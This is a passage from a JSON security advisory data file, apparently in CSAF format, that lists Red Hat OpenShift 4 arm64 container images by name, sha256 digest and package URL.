"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64",
"product_id": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-lifecycle-manager-rhel9@sha256%3Aa97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604626"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64",
"product_id": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-registry-rhel9@sha256%3A43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565149"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-api-server-rhel9@sha256%3Ab3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606032"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-csr-approver-rhel9@sha256%3A5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572826"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-node-agent-rhel9@sha256%3Aa676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606441"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-orchestrator-rhel9@sha256%3A0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572582"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-utils-rhel9@sha256%3A2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604573"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64",
"product_id": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-apiserver-network-proxy-rhel9@sha256%3A4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564822"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64",
"product_id": "registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-aws-cloud-controller-manager-rhel9@sha256%3A6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557318"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64",
"product_id": "registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-aws-cluster-api-controllers-rhel9@sha256%3Aae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557600"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64",
"product_id": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-aws-ebs-csi-driver-rhel9@sha256%3Ade7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602036"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64",
"product_id": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-aws-ebs-csi-driver-rhel9-operator@sha256%3A67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602004"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64",
"product_id": "registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-aws-pod-identity-webhook-rhel9@sha256%3A240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557257"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64",
"product_id": "registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-cloud-controller-manager-rhel9@sha256%3A2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557692"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64",
"product_id": "registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-cloud-node-manager-rhel9@sha256%3Adeb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557468"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64",
"product_id": "registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-cluster-api-controllers-rhel9@sha256%3Ad665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602036"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64",
"product_id": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-disk-csi-driver-rhel9@sha256%3Ab13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602060"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64",
"product_id": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-disk-csi-driver-rhel9-operator@sha256%3A086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557684"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64",
"product": {
"name": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64",
"product_id": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/azure-service-rhel9-operator@sha256%3Adcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606981"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64",
"product_id": "registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-workload-identity-webhook-rhel9@sha256%3A834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557341"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-cluster-api-controllers-rhel9@sha256%3A66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557282"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-installer-rhel9@sha256%3A480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775607663"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-rhel9-operator@sha256%3A3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557287"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cli-artifacts-rhel9@sha256%3Aa9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577250"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cloud-credential-rhel9-operator@sha256%3A7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775607238"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64",
"product": {
"name": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64",
"product_id": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/cloud-network-config-controller-rhel9@sha256%3A46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572181"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-api-rhel9@sha256%3A6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606727"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-authentication-rhel9-operator@sha256%3A8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572199"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-config-api-rhel9@sha256%3A572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604875"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-autoscaler-rhel9-operator@sha256%3Aa400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564820"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-baremetal-operator-rhel9@sha256%3A79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573046"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-bootstrap-rhel9@sha256%3A12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572490"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-capi-rhel9-operator@sha256%3Aa1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564722"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-cloud-controller-manager-rhel9-operator@sha256%3Ac8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604711"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-config-rhel9-operator@sha256%3Acd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557260"
}
}
},
{
"category": "product_version",
